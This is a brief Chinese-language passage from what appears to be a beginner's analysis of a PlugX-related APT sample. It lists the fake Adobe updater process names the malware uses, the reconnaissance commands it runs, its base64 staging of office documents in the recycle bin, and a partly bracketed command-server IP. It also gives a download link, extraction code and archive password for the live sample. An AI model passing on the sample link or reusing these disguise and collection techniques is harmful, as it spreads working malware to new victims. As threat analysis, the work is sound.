AdobeHelper.exe
AdobeUpdates.exe
AdobeUpdate.exe
AdobeARM.exe
AAM Update.exe
AAM Updates.exe

信息泄露（执行的命令）

systeminfo
ipconfig
netstat
arp
tasklist

编码/加密

扩展名为 .doc、.docx、.ppt、.pptx、.xls、.xlsx、.pdf使用base64加密并放入回收站

远程连接

45.142.166.[112]

第一次分析APT样本，在网络连接方面没确定接收命令的接收函数在哪。从恶意程序网络连接的行为来看，可以推测存在远程命令执行的操作。另外恶意进程在任务管理器中无法删除，存在删除终止进程的文件的代码，也没定位。后面会随缘再尝试分析代码找找。感谢您读到这。

样本链接

链接：https://pan.baidu.com/s/1Y_xrV-7fAQRziJ7Z7u4PUQ提取码：pttc压缩密码：52pojie

参考链接：

https://www.trendmicro.com/vinfo/jp/threat-encyclopedia/print/malware/Backdoor.Win32.PLUGX.EYSGVM